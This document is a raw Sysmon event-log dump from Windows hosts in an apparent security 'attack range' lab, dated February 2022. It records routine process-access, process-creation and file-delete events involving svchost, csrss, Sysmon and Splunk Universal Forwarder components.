10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0E7C-6216-FF03-000000003902}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E7C-6216-FF03-000000003902}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.110{4F8D34B0-0E7C-6216-FF03-000000003902}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:49.856{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E7762C825B126253F676EFDA8DB0B08,SHA256=C528EA869F9C4577200CEA9F9325E01178D6C77115B9CA54390C93007CDA689C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E7D-6216-0104-000000003902}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0E7D-6216-0104-000000003902}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.984{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E7D-6216-0104-000000003902}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.985{4F8D34B0-0E7D-6216-0104-000000003902}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.687{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=144C6E62BC5E20827A6C1E5078AEAFD3,SHA256=34D5D3FEFDF7D9593AE1866DD4FBF1D74E39CE6ED7182589B8AFA5C757C5CDA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.515{4F8D34B0-0E7D-6216-0004-000000003902}8803716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E7D-6216-0004-000000003902}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 